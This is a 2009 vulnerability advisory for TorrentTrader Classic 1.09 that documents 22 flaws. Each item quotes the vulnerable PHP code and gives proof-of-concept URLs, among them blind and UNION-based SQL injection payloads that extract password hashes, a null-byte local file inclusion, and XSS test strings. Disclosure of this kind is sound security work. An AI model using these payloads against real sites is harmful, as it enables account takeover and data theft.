[waraxe-2009-SA#074] - Multiple Vulnerabilities in TorrentTrader Classic 1.09=0D
================================================================================0D
=0D
Author: Janek Vind "waraxe"=0D
Date: 15. June 2009=0D
Location: Estonia, Tartu=0D
Web: http://www.waraxe.us/advisory-74.html=0D
=0D
=0D
Description of vulnerable software:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
TorrentTrader is a feature packed and highly customisable PHP/MySQL Based=0D
BitTorrent tracker. Featuring integrated forums and plenty of administration=0D
options. Please visit www.torrenttrader.org for the support forums.=0D
=0D
http://sourceforge.net/projects/torrenttrader =0D
=0D
=0D
List of found vulnerabilities=0D
================================================================================0D
=0D
1. Sql Injection vulnerability in "account-inbox.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
1. unsanitized user submitted parameter "origmsg" is used in sql query=0D
Preconditions:=0D
1. attacker must be logged in as valid user=0D
=0D
Test:=0D
=0D
http://localhost/torrenttrader109/account-inbox.php?msg=1&receiver=waraxe&origmsg=foobar&delete=yes=0D
=0D
Result: "MYSQL Error has occurred!"=0D
=0D
-----------------------------[source code start]-------------------------------=0D
if ($msg) {=0D
$msg = trim($msg);=0D
=0D
$res = mysql_query("SELECT id, acceptpms, notifs, email, UNIX_TIMESTAMP(last_access) as la FROM users WHERE username=".sqlesc($receiver)."");=0D
$user = mysql_fetch_assoc($res);=0D
if (!$user)=0D
$message = "Username not found.";=0D
...=0D
=0D
if ($origmsg && $delete == "yes")=0D
mysql_query("DELETE FROM messages WHERE id=$origmsg") or sqlerr();=0D
-----------------------------[source code end]---------------------------------=0D
=0D
=0D
2. Weak password generation algorithm in "account-recover.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
1. generated password is weak and can be easily bruteforced=0D
Preconditions:=0D
1. attacker must know email address associated with target's account=0D
=0D
Torrenttrader contains password reseting functionality:=0D
=0D
http://localhost/torrenttrader109/account-recover.php=0D
=0D
Anyone can initiate password reset, only condition is, that target's email=0D
address must be know. Torrenttrader will check email address and after successful=0D
validation new, temporal password will be generated and sent to that email address.=0D
Specific autogenerated password appears to be random number between 10000 and 50000,=0D
so basically there can be only 40000 possible temporal passwords. It's easy to=0D
write bruteforce script, which will try all possible password combinations.=0D
This process can take couple of hours or more, but eventually the password will=0D
be guessed and target account becomes compromised.=0D
=0D
-----------------------------[source code start]-------------------------------=0D
if ($HTTP_SERVER_VARS["REQUEST_METHOD"] == "POST") {=0D
$email = trim($_POST["email"]);=0D
if (!validemail($email)) {=0D
$msg = "" . NOT_VAILD_EMAIL . "";=0D
$kind = "Error";=0D
}=0D
else {=0D
$res = mysql_query("SELECT * FROM users WHERE email=" . sqlesc($email) . " LIMIT 1");=0D
$arr = mysql_fetch_assoc($res);=0D
=0D
if (!$arr) {=0D
$msg = "" . EMAIL_INVALID . "";=0D
$kind = "Error";=0D
}=0D
...=0D
if ($arr) {=0D
$newpassword = rand(10000, 50000);=0D
$md5pass = md5($newpassword);=0D
-----------------------------[source code end]---------------------------------=0D
=0D
=0D
3. Unauthorized database backup vulnerability in "backup-database.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
1. missing access control=0D
Preconditions:=0D
1. mysqldump utility must be available=0D
2. gzip utility must be available=0D
3. target directory must be writable=0D
4. database name must be known in order to successfully guess archive filename=0D
=0D
Test:=0D
=0D
http://localhost/torrenttrader109/backup-database.php=0D
=0D
Resulting message: "Database backup successful, entry inserted into database."=0D
=0D
-----------------------------[source code start]-------------------------------=0D
system(sprintf( =0D
'mysqldump --opt -h %s -u %s -p%s %s | gzip > %s/%s/%s-%s-%s-%s.gz', =0D
$host,=0D
$user,=0D
$pass,=0D
$db,=0D
getenv('DOCUMENT_ROOT'),=0D
$backupdir,=0D
$db,=0D
$day,=0D
$month,=0D
$year=0D
)); =0D
-----------------------------[source code end]---------------------------------=0D
=0D
Attacker is able to create database backup and resulting "gz" archive's=0D
filename can be guessed, if attacker knows database name. This file is also=0D
directly downloadable from website. Example download URI:=0D
=0D
http://localhost/torrenttrader109/backups/torrenttrader109-10-06-2009.gz=0D
=0D
As result information leakage exists. For example, attacker can fetch admin=0D
credentials from backed up database.=0D
=0D
=0D
4. Sql Injection vulnerability in "browse.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
1. uninitialized variable "wherecatin" is used in sql query=0D
Preconditions:=0D
1. none=0D
=0D
Test:=0D
=0D
http://localhost/torrenttrader109/browse.php?wherecatin=waraxe=0D
=0D
Result:=0D
=0D
Unknown column 'waraxe' in 'where clause'=0D
=0D
-----------------------------[source code start]-------------------------------=0D
if (count($wherecatina) > 1)=0D
$wherecatin = implode(",",$wherecatina);=0D
elseif (count($wherecatina) == 1)=0D
$wherea[] = "category = $wherecatina[0]";=0D
...=0D
if ($wherecatin)=0D
$where .= ($where ? " AND " : "") . "category IN(" . $wherecatin . ")";=0D
=0D
if ($where != "")=0D
$where = "WHERE $where";=0D
=0D
$res = mysql_query("SELECT COUNT(*) FROM torrents $where") or die(mysql_error());=0D
-----------------------------[source code end]---------------------------------=0D
=0D
This specific sql injection vulneraility can be exploited using blind attack=0D
methods. If there is one or more active torrents in database, then usable is=0D
attack pattern below:=0D
=0D
http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,1,2)=(SELECT+1=0D
=0D
and we see found torrents.=0D
=0D
http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,1,2)=(SELECT+1=0D
=0D
"No torrents were found based on your search criteria."=0D
=0D
In this way attacker is able to ask boolean questions from database and retrieve=0D
needed information bit by bit - example of classical blind sql injection.=0D
=0D
If there is no active torrents in database, then induced sql errors method can be used.=0D
=0D
http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1=0D
=0D
"Subquery returns more than 1 row"=0D
=0D
http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1=0D
=0D
"No torrents were found based on your search criteria."=0D
=0D
=0D
5. Information leakage in "check.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
1. missing access control=0D
Preconditions:=0D
1. none=0D
=0D
Test:=0D
=0D
http://localhost/torrenttrader109/check.php=0D
=0D
This script is originally meant to be used by installer and lately by admins.=0D
Because of lacking access control attacker is able to use it for gathering some=0D
useful information about target system - full path to webroot, file and directory=0D
permissions of specific files, couple of php settings.=0D
=0D
6. Sql Injection vulnerability in "delreq.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
1. unsanitized user submitted parameter "categ" is used in sql query=0D
Preconditions:=0D
1. attacker must have at least super moderator privileges (user class > 3)=0D
Comments:=0D
1. very easy to exploit=0D
=0D
Test:=0D
=0D
http://localhost/torrenttrader109/delreq.php?categ=waraxe=0D
=0D
Result:=0D
=0D
You have an error in your SQL syntax; check the manual that corresponds to your=0D
MySQL server version for the right syntax to use near=0D
'waraxe order by requests.request LIMIT 0,50' at line 1=0D
=0D
Test 2:=0D
=0D
http://localhost/torrenttrader109/delreq.php?categ=UNION+ALL+SELECT+1,2,3,4,5,username,password,email+FROM+users--+=0D
=0D
and we can see all usernames, password hashes and emails from database.=0D
=0D
=0D
7. Sql Injection vulnerability in "index.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
1. unsanitized user submitted parameter "choice" is used in sql query=0D
Preconditions:=0D
1. attacker must be logged in as valid user=0D
2. there must exist at least one poll=0D
=0D
Testing needs custom written html form:=0D
-------------------------------------------------------------------------------=0D
=0D
=0D
-------------------------------------------------------------------------------=0D
=0D
Result: "MYSQL Error has occurred!"=0D
=0D
-----------------------------[source code start]-------------------------------=0D
if ($_SERVER["REQUEST_METHOD"] == "POST")=0D
{=0D
$choice = $_POST["choice"];=0D
if ($CURUSER && $choice != "" && $choice < 256 && $choice == floor($choice))=0D
{=0D
$res = mysql_query("SELECT * FROM polls ORDER BY added DESC LIMIT 1") or sqlerr();=0D
$arr = mysql_fetch_assoc($res) or die("No poll");=0D
$pollid = $arr["id"];=0D
$userid = $CURUSER["id"];=0D
$res = mysql_query("SELECT * FROM pollanswers WHERE pollid=$pollid && userid=$userid") or sqlerr();=0D
$arr = mysql_fetch_assoc($res);=0D
if ($arr) die("Dupe vote");=0D
mysql_query("INSERT INTO pollanswers VALUES(0, $pollid, $userid, $choice)") or sqlerr();=0D
-----------------------------[source code end]---------------------------------=0D
=0D
=0D
8. Sql Injection vulnerability in "modrules.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
1. unsanitized user submitted parameter "id" is used in sql query=0D
Preconditions:=0D
1. attacker must have at least moderator privileges=0D
=0D
Testing needs custom written html form:=0D
-------------------------------------------------------------------------------=0D
=0D
=0D
-------------------------------------------------------------------------------=0D
=0D
Test result: "MYSQL Error has occurred!"=0D
=0D
-----------------------------[source code start]-------------------------------=0D
elseif ($_GET["act"]=="edited"){=0D
$id = $_POST["id"];=0D
$title = sqlesc($_POST["title"]);=0D
$text = sqlesc($_POST["text"]);=0D
$public = sqlesc($_POST["public"]);=0D
$class = sqlesc($_POST["class"]);=0D
mysql_query("update rules set title=$title, text=$text, public=$public,=0D
class=$class where id=$id") or sqlerr(__FILE__,__LINE__);=0D
-----------------------------[source code end]---------------------------------=0D
=0D
=0D
9. Information leakage in "phpinfo.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
1. missing access control=0D
Preconditions:=0D
1. none=0D
=0D
Test:=0D
=0D
http://localhost/torrenttrader109/phpinfo.php=0D
=0D
-----------------------------[source code start]-------------------------------=0D
=0D
-----------------------------[source code end]---------------------------------=0D
=0D
This script can be used by attacker to obtain information from php function=0D
phpinfo(). Access to such script must be limited to admins, but currently there=0D
is not any access control at all.=0D
=0D
=0D
10. Sql Injection vulnerabilities in "report.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
1. unsanitized user submitted parameter "user" is used in sql query=0D
2. unsanitized user submitted parameter "torrent" is used in sql query=0D
3. unsanitized user submitted parameter "forumid" is used in sql query=0D
4. unsanitized user submitted parameter "forumpost" is used in sql query=0D
Preconditions:=0D
1. attacker must be logged in as valid user=0D
=0D
Two proof-of-concept tests below are using parameter "user".=0D
=0D
Test 1 needs custom written html form:=0D
-------------------------------------------------------------------------------=0D
=0D
=0D
-------------------------------------------------------------------------------=0D
=0D
Test result: "MYSQL Error has occurred!"=0D
=0D
Test 2 needs custom written html form:=0D
-----------------------------[source code start]-------------------------------=0D
=0D
=0D
-----------------------------[source code end]---------------------------------=0D
=0D
Test result: "You have already reported user ..."=0D
=0D
It's classical blind sql injection exploitation method and allows attacker to=0D
fetch information from database bit by bit by asking boolean questions.=0D
=0D
Other three sql injection vulnerabilities in "report.php" involve user submitted=0D
parameters "torrent", "forumid" and "forumpost" and exploitation can be done in=0D
similar way as seen above.=0D
=0D
=0D
11. Sql Injection vulnerability in "take-deletepm.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
1. unsanitized user submitted parameter "delmp" is used in sql query=0D
Preconditions:=0D
1. attacker must have admin privileges=0D
=0D
-----------------------------[source code start]-------------------------------=0D
if(isset($_POST["delmp"])) {=0D
$do="DELETE FROM messages WHERE id IN (" . implode(", ", $_POST[delmp]) . ")";=0D
$res=mysql_query($do)=0D
-----------------------------[source code end]---------------------------------=0D
=0D
=0D
12. Sql Injection vulnerability in "takedelreport.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
1. unsanitized user submitted parameter "delreport" is used in sql query=0D
Preconditions:=0D
1. attacker must have at least moderator privileges=0D
=0D
-----------------------------[source code start]-------------------------------=0D
jmodonly();=0D
=0D
$res = mysql_query ("SELECT id FROM reports WHERE dealtwith=0 =0D
AND id IN (" . implode(", ", $_POST[delreport]) . ")");=0D
-----------------------------[source code end]---------------------------------=0D
=0D
=0D
13. Sql Injection vulnerability in "takedelreq.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
1. unsanitized user submitted parameter "delreq" is used in sql query=0D
Preconditions:=0D
1. attacker must be logged in as valid user=0D
=0D
-----------------------------[source code start]-------------------------------=0D
if (get_user_class() > UC_JMODERATOR){=0D
...=0D
$do="DELETE FROM requests WHERE id IN (" . implode(", ", $_POST[delreq]) . ")";=0D
$do2="DELETE FROM addedrequests WHERE requestid IN (" . implode(", ", $_POST[delreq]) . ")";=0D
$res2=mysql_query($do2);=0D
$res=mysql_query($do);=0D
...=0D
} else {=0D
foreach ($_POST[delreq] as $del_req){=0D
$delete_ok = checkRequestOwnership($CURUSER[id],$del_req);=0D
if ($delete_ok){=0D
$do="DELETE FROM requests WHERE id IN ($del_req)";=0D
$do2="DELETE FROM addedrequests WHERE requestid IN ($del_req)";=0D
...=0D
function checkRequestOwnership ($user, $delete_req){=0D
$query = mysql_query("SELECT * FROM requests WHERE userid=$user AND id = $delete_req") or sqlerr();=0D
-----------------------------[source code end]---------------------------------=0D
=0D
=0D
=0D
14. Sql Injection vulnerability in "takestaffmess.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
1. unsanitized user submitted parameter "clases" is used in sql query=0D
Preconditions:=0D
1. attacker must have admin privileges=0D
=0D
-----------------------------[source code start]-------------------------------=0D
adminonly();=0D
...=0D
$updateset = $_POST['clases'];=0D
=0D
$query = mysql_query("SELECT id FROM users WHERE class IN (".implode(",", $updateset).")");=0D
-----------------------------[source code end]---------------------------------=0D
=0D
=0D
15. Sql Injection vulnerability in "takewarndisable.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
1. unsanitized user submitted parameter "warndisable" is used in sql query=0D
Preconditions:=0D
1. attacker must have at least moderator privileges=0D
=0D
-----------------------------[source code start]-------------------------------=0D
jmodonly();=0D
...=0D
if ($disable != '') {=0D
$do="UPDATE users SET enabled='no' WHERE id IN (" . implode(", ", $_POST['warndisable']) . ")";=0D
$res=mysql_query($do);=0D
}=0D
=0D
if ($enable != '') {=0D
$do = "UPDATE users SET enabled='yes' WHERE id IN (" . implode(", ", $_POST['warndisable']) . ")";=0D
$res = mysql_query($do);=0D
}=0D
-----------------------------[source code end]---------------------------------=0D
=0D
=0D
16. Sql Injection vulnerability in "today.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
1. uninitialized variable "limit" is used in sql query=0D
Preconditions:=0D
1. none=0D
Comments:=0D
1. seems hard to exploit=0D
=0D
Test:=0D
=0D
http://localhost/torrenttrader109/today.php?limit=waraxe=0D
=0D
Result: =0D
=0D
"Warning: mysql_num_rows(): supplied argument is not a valid MySQL result=0D
resource in C:\apache_wwwroot\torrenttrader109\today.php on line 21"=0D
=0D
=0D
17. Sql Injection vulnerability in "torrents-details.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
1. uninitialized variable "where" is used in sql query=0D
Preconditions:=0D
1. none=0D
=0D
-----------------------------[source code start]-------------------------------=0D
//speed mod=0D
$resSpeed = mysql_query("SELECT seeders,leechers FROM torrents=0D
WHERE $where visible='yes' and id = $id ORDER BY added DESC LIMIT 15")=0D
or sqlerr(__FILE__, __LINE__); =0D
-----------------------------[source code end]---------------------------------=0D
=0D
Exploitation is possible using blind sql injection methods.=0D
=0D
Test 1:=0D
=0D
http://localhost/torrenttrader109/torrents-details.php?id=1&=0D
where=1=IF(LENGTH(@@version)>1,1,(SELECT+1+UNION+ALL+SELECT+1))--+=0D
=0D
Result: normal page=0D
=0D
Test 2:=0D
=0D
http://localhost/torrenttrader109/torrents-details.php?id=1&=0D
where=1=IF(LENGTH(@@version)>50,1,(SELECT+1+UNION+ALL+SELECT+1))--+=0D
=0D
Result: "MYSQL Error has occurred!"=0D
=0D
=0D
18. Sql Injection vulnerability in "admin-delreq.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
1. uninitialized variable "categ" is used in sql query=0D
Preconditions:=0D
1. attacker must have at least moderator privileges=0D
=0D
-----------------------------[source code start]-------------------------------=0D
jmodonly();=0D
...=0D
$res=mysql_query("SELECT users.username, requests.filled, requests.filledby,=0D
requests.id, requests.userid, requests.request, requests.added, categories.name=0D
as cat FROM requests inner join categories on requests.cat = categories.id=0D
inner join users on requests.userid = users.id=0D
$categ order by requests.request $limit") or print(mysql_error());=0D
-----------------------------[source code end]---------------------------------=0D
=0D
Test:=0D
=0D
http://localhost/torrenttrader109/admin-delreq.php?categ=waraxe=0D
=0D
Result: "You have an error in your SQL syntax; check the manual that corresponds=0D
to your MySQL server version for the right syntax to use=0D
near 'waraxe order by requests.request LIMIT 0,50' at line 1"=0D
=0D
=0D
19. Persistent XSS in "viewrequests.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
1. unsanitized user submitted parameters used in response html generation=0D
Preconditions:=0D
1. attacker must be logged in as valid user=0D
=0D
Steps for testing:=0D
=0D
a) attacker submits request:=0D
=0D
http://localhost/torrenttrader109/requests.php=0D
=0D
In "Title" field let's insert some javascript:=0D
=0D
testtitle=0D
=0D
b) admin will browse requests:=0D
=0D
http://localhost/torrenttrader109/viewrequests.php=0D
=0D
and previously planted javascript will be executed in admin session context.=0D
=0D
=0D
=0D
20. Persistent XSS in logging funtionality=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
1. unsanitized user submitted parameters used in response html generation=0D
Preconditions:=0D
1. attacker must be logged in as valid user=0D
=0D
Steps for testing:=0D
=0D
a) attacker uploads torrent file:=0D
=0D
http://localhost/torrenttrader109/torrents-upload.php=0D
=0D
In "Torrent Name" field let's insert some javascript:=0D
=0D
testname=0D
=0D
Upload is successful: "The torrent has been uploaded successfully!"=0D
=0D
b) admin will browse logs:=0D
=0D
http://localhost/torrenttrader109/admin.php?act=view_log=0D
=0D
and previously planted javascript will be executed in admin session context.=0D
=0D
=0D
21. Local File Inclusion vulnerability in "backend/admin-functions.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
1. URI case-insensitivity on Windows platform=0D
Preconditions:=0D
1. Windows platform=0D
2. register_globals=on=0D
3. magic_quotes_gpc=off=0D
=0D
-----------------------------[source code start]-------------------------------=0D
if (strpos($_SERVER['REQUEST_URI'], "admin-functions.php") !== false) die;=0D
require_once("./themes/" . $GLOBALS['ss_uri'] . "/block.php");=0D
-----------------------------[source code end]---------------------------------=0D
=0D
As we can see from source code snippet above, direct access to script is blocked.=0D
In case of Windows and Apache combination URI handling is case-insensitive.=0D
In other hand "strpos()" function, used for access control, is case-sensitive.=0D
So this script can be directly executed, if we change some characters in script's=0D
filename to uppercase:=0D
=0D
http://localhost/torrenttrader109/backend/Admin-functions.php=0D
=0D
"Warning: require_once(./themes//block.php) [function.require-once]:=0D
failed to open stream: No such file or directory in=0D
C:\apache_wwwroot\torrenttrader109\backend\admin-functions.php on line 3"=0D
=0D
If "register_globals=on" and "magic_quotes_gpc=off", then LFI is possible:=0D
=0D
http://localhost/torrenttrader109/backend/Admin-functions.php?ss_uri=../../banners.txt%00=0D
=0D
=0D
22. Reflected XSS in multiple scripts=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Examples:=0D
=0D
http://localhost/torrenttrader109/themes/default/footer.php?ttversion==0D
=0D">http://localhost/torrenttrader109/themes/default/header.php?SITENAME=">=0D
http://localhost/torrenttrader109/themes/default/header.php?CURUSER[username]==0D
http://localhost/torrenttrader109/visitorstoday.php?todayactive==0D
http://localhost/torrenttrader109/visitorsnow.php?activepeople==0D
http://localhost/torrenttrader109/faq.php?faq_categ[999][title]=&faq_categ[999][flag]=1=0D
=0D">http://localhost/torrenttrader109/torrents-details.php?id=1&keepget=">=0D
=0D
=0D
Greetings:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,=0D
to all active waraxe.us forum members and to anyone else who know me!=0D
=0D
=0D
Contact:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
come2waraxe@yahoo.com=0D
Janek Vind "waraxe"=0D
=0D
Waraxe forum: http://www.waraxe.us/forums.html=0D
Personal homepage: http://www.janekvind.com/=0D
---------------------------------- [ EOF ] ------------------------------------=0D